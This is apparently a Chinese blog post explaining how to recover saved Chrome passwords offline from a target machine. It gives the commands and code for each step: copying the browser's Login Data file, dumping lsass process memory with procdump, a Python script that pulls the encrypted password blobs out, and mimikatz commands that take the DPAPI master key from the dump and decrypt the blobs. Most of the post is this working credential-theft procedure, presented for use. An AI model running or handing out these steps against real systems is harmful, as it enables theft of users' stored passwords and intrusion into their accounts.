解密-利用Masterkey离线导出Chrome浏览器中保存的密码

利用Masterkey离线导出Chrome浏览器中保存的密码

快速说明

  1. 需要浏览器Login Data文件 和 lsass进程的内存文件

步骤一 获得目标Login Data

copy  %LocalAppData%\Google\Chrome\User Data\Default\Login Data  Login_Data        # 这里保存的文件名改变了,多了个"_"

步骤二 获得lsass进程的内存文件

tasklist /fi "imagename eq lsass.exe"
procdump -accepteula -ma 640 lsass.dmp   管理员权限

步骤三 把Login Data的密码提取出来(会生成test.txt文件)

from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect("Login_Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
    f = open('test.txt', 'wb')
    f.write(result[2])
    f.close()

步骤四 在本地使用mimikatz提取Master Key,解密Login Data获得明文

使用mimikatz加载dmp文件:            # 注:mimikatz从lsass进程提取出Master Key后,会自动将Master Key加入系统缓存
    sekurlsa::minidump lsass.dmp
    sekurlsa::dpapi


使用masterkey解密
    dpapi::blob /in:test.txt


把获得的ascii的密码放到burp里解开即是密码
posted @   是谁走漏了消息  阅读(1143)  评论(0编辑  收藏  举报
相关博文:
· 解密-MobaXterm密码解密
· mimikatz使用
· 渗透系列:导出Chrome浏览器中保存的密码
· 浏览器保存密码获取与解密
· Chrome浏览器数据迁移
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示